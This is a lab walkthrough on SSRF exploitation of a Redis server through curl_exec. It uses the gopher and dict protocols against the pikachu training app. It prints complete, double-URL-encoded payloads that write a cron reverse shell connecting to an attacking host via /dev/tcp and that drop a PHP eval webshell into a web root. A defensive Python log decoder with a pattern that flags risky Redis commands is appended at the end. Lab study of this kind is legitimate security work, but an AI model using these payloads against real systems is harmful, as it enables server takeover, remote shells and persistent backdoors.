Extended SSRF exploitation: contents
- Extended SSRF exploitation
- curl_exec function
- 1. SSRF with the gopher protocol: reverse shell
- 2. SSRF with the gopher protocol: writing a webshell
- 3. SSRF with the gopher protocol: passwordless SSH login
- 4. SSRF with the dict protocol: reverse shell
curl_exec function
1. SSRF with the gopher protocol: reverse shell
Lab environment:
(1) 192.168.142.201 # Redis server
(2) 192.168.142.133 # attacking machine
(3) 192.168.142.1 # SSRF target
1. Build the reverse shell with a cron job
set xx "\n* * * * * bash -i >& /dev/tcp/192.168.142.133/8888 0>&1\n"
config set dir /var/spool/cron
config set dbfilename root
save
2. URL-encode it
%73%65%74%20%78%78%20%22%5c%6e%2a%20%2a%20%2a%20%2a%20%2a%20%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%34%32%2e%31%33%33%2f%38%38%38%38%20%30%3e%26%31%5c%6e%22%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%69%72%20%2f%76%61%72%2f%73%70%6f%6f%6c%2f%63%72%6f%6e%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%62%66%69%6c%65%6e%61%6d%65%20%72%6f%6f%74%0a%73%61%76%65
3. Then replace every %0a with %0d%0a, append a trailing %0d%0a, and URL-encode the result once more
%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%36%32%25%36%31%25%37%33%25%36%38%25%32%30%25%32%64%25%36%39%25%32%30%25%33%65%25%32%36%25%32%30%25%32%66%25%36%34%25%36%35%25%37%36%25%32%66%25%37%34%25%36%33%25%37%30%25%32%66%25%33%31%25%33%39%25%33%32%25%32%65%25%33%31%25%33%36%25%33%38%25%32%65%25%33%31%25%33%34%25%33%32%25%32%65%25%33%31%25%33%33%25%33%33%25%32%66%25%33%38%25%33%38%25%33%38%25%33%38%25%32%30%25%33%30%25%33%65%25%32%36%25%33%31%25%35%63%25%36%65%25%32%32%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%33%25%37%30%25%36%66%25%36%66%25%36%63%25%32%66%25%36%33%25%37%32%25%36%66%25%36%65%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%32%25%36%66%25%36%66%25%37%34%25%30%64%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35%25%30%64%25%30%61
4. Encode the gopher prefix of the parameter
gopher://192.168.142.201:6379/_
After encoding: gopher%3a%2f%2f192.168.142.201%3a6379%2f_
5. Assemble the final payload
http://192.168.142.1/pikachu-master/vul/ssrf/ssrf_curl.php?url=gopher%3a%2f%2f192.168.142.201%3a6379%2f_%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%36%32%25%36%31%25%37%33%25%36%38%25%32%30%25%32%64%25%36%39%25%32%30%25%33%65%25%32%36%25%32%30%25%32%66%25%36%34%25%36%35%25%37%36%25%32%66%25%37%34%25%36%33%25%37%30%25%32%66%25%33%31%25%33%39%25%33%32%25%32%65%25%33%31%25%33%36%25%33%38%25%32%65%25%33%31%25%33%34%25%33%32%25%32%65%25%33%31%25%33%33%25%33%33%25%32%66%25%33%38%25%33%38%25%33%38%25%33%38%25%32%30%25%33%30%25%33%65%25%32%36%25%33%31%25%35%63%25%36%65%25%32%32%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%33%25%37%30%25%36%66%25%36%66%25%36%63%25%32%66%25%36%33%25%37%32%25%36%66%25%36%65%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%32%25%36%66%25%36%66%25%37%34%25%30%64%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35%25%30%64%25%30%61
6. Start a listener on the attacking machine; the shell connects back successfully
2. SSRF with the gopher protocol: writing a webshell
1. Build a one-line webshell
set xx "\n<?php @eval($_POST[test]);?>\n"
config set dir /www/admin/localhost_80/wwwroot
config set dbfilename test.php
save
2. URL-encode it
%73%65%74%20%78%78%20%22%5c%6e%3c%3f%70%68%70%20%40%65%76%61%6c%28%24%5f%50%4f%53%54%5b%74%65%73%74%5d%29%3b%3f%3e%5c%6e%22%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%69%72%20%2f%77%77%77%2f%61%64%6d%69%6e%2f%6c%6f%63%61%6c%68%6f%73%74%5f%38%30%2f%77%77%77%72%6f%6f%74%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%62%66%69%6c%65%6e%61%6d%65%20%74%65%73%74%2e%70%68%70%0a%73%61%76%65
3. Then replace every %0a with %0d%0a, append a trailing %0d%0a, and URL-encode the result once more
%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%34%30%25%36%35%25%37%36%25%36%31%25%36%63%25%32%38%25%32%34%25%35%66%25%35%30%25%34%66%25%35%33%25%35%34%25%35%62%25%37%34%25%36%35%25%37%33%25%37%34%25%35%64%25%32%39%25%33%62%25%33%66%25%33%65%25%35%63%25%36%65%25%32%32%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65%25%32%66%25%36%63%25%36%66%25%36%33%25%36%31%25%36%63%25%36%38%25%36%66%25%37%33%25%37%34%25%35%66%25%33%38%25%33%30%25%32%66%25%37%37%25%37%37%25%37%37%25%37%32%25%36%66%25%36%66%25%37%34%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%34%25%36%35%25%37%33%25%37%34%25%32%65%25%37%30%25%36%38%25%37%30%25%30%64%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35%25%30%64%25%30%61
4. Encode the gopher prefix of the parameter
gopher://192.168.142.201:6379/_
After encoding: gopher%3a%2f%2f192.168.142.201%3a6379%2f_
5. Assemble the final payload
http://192.168.142.1/pikachu-master/vul/ssrf/ssrf_curl.php?url=gopher%3a%2f%2f192.168.142.201%3a6379%2f_%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%34%30%25%36%35%25%37%36%25%36%31%25%36%63%25%32%38%25%32%34%25%35%66%25%35%30%25%34%66%25%35%33%25%35%34%25%35%62%25%37%34%25%36%35%25%37%33%25%37%34%25%35%64%25%32%39%25%33%62%25%33%66%25%33%65%25%35%63%25%36%65%25%32%32%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65%25%32%66%25%36%63%25%36%66%25%36%33%25%36%31%25%36%63%25%36%38%25%36%66%25%37%33%25%37%34%25%35%66%25%33%38%25%33%30%25%32%66%25%37%37%25%37%37%25%37%37%25%37%32%25%36%66%25%36%66%25%37%34%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%34%25%36%35%25%37%33%25%37%34%25%32%65%25%37%30%25%36%38%25%37%30%25%30%64%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35%25%30%64%25%30%61
6. Connect with a webshell client; the connection succeeds
3. SSRF with the gopher protocol: passwordless SSH login
The approach is much the same. The encoded public key is very long, so it is not pasted here.
4. SSRF with the dict protocol: reverse shell
1. Change the dump file name to root
dict://192.168.142.201:6379/config:set:dbfilename root
2. Change the storage directory to /var/spool/cron
dict://192.168.142.201:6379/config:set:dir:/var/spool/cron
3. Write the reverse shell
dict://192.168.142.201:6379/set:test:"\n\n* * * * * /bin/bash -i >& /dev/tcp/192.168.142.133/8888 0>&1\n\n"
If the payload gets escaped, try hex-encoding it instead:
dict://192.168.142.201:6379/set:test:"\n\n\x2a\x20\x2a\x20\x2a\x20\x2a\x20\x2a\x20/bin/bash\x20\x2di\x20\x3e\x26\x20/dev/tcp/192.168.142.133/8888\x200\x3e\x261\n\n"
4. Save
dict://192.168.142.201:6379/save
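The encoding chain from sections 1, 2 and 4 (URL-encode, switch to CRLF, URL-encode again, prefix gopher:// or dict://) is reversed below so a defender reviewing access logs or writing a WAF rule can see the exact Redis commands a url= parameter would hand to curl; this is an added example, not code from the original post. The two request lines, the RISKY command list and the function names are constructed assumptions; the host, port and script path are the ones used in the write-up.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Redis commands that change where or what the server persists; every
# write-up above relies on them once the gopher/dict wrapper is stripped.
RISKY = re.compile(r"^(?:config\s+set\s+(?:dir|dbfilename)\b|save\b|flushall\b|slaveof\b)", re.I)

# Constructed sample requests (hypothetical, not from the original post):
# the same two-layer encoding as section 1, carrying only the config/save
# lines, and the dict form from section 4.
SAMPLE_GOPHER_REQUEST = (
    "/pikachu-master/vul/ssrf/ssrf_curl.php?url=gopher%3a%2f%2f192.168.142.201%3a6379%2f_"
    "config%2520set%2520dir%2520/var/spool/cron%250d%250a"
    "config%2520set%2520dbfilename%2520root%250d%250asave%250d%250a"
)
SAMPLE_DICT_REQUEST = (
    "/pikachu-master/vul/ssrf/ssrf_curl.php?url="
    "dict%3a%2f%2f192.168.142.201%3a6379%2fconfig%3aset%3adir%3a%2fvar%2fspool%2fcron"
)


def decode_ssrf_target(url_value: str) -> dict:
    """Decode one url= value as the PHP script already sees it (query layer removed)."""
    parts = urlsplit(url_value)
    scheme = parts.scheme.lower()
    commands = []
    if scheme == "gopher":
        # Path is "/<item type><selector>"; curl percent-decodes the selector
        # once more before writing it to the socket, which undoes the second
        # URL-encoding from step 3 and exposes the CRLF-separated commands.
        selector = unquote(parts.path[2:])
        commands = [c for c in re.split(r"\r?\n", selector) if c.strip()]
    elif scheme == "dict":
        # curl sends a dict path that is not a d:/m: lookup with ':' turned into ' '.
        commands = [parts.path.lstrip("/").replace(":", " ")]
    return {"scheme": scheme, "netloc": parts.netloc, "commands": commands,
            "flagged": [c for c in commands if RISKY.match(c.strip())]}


def scan_request_uri(request_uri: str) -> dict:
    """Pull the url= parameter out of a logged request URI and decode it."""
    # parse_qs removes the query-string percent layer, like PHP's $_GET does.
    values = parse_qs(urlsplit(request_uri).query).get("url", [""])
    return decode_ssrf_target(values[0])


if __name__ == "__main__":
    for req in (SAMPLE_GOPHER_REQUEST, SAMPLE_DICT_REQUEST):
        print(scan_request_uri(req))
```

Any request whose decoded scheme is gopher or dict is already worth alerting on, since a curl_exec fetcher restricted to http and https with CURLOPT_PROTOCOLS never needs either.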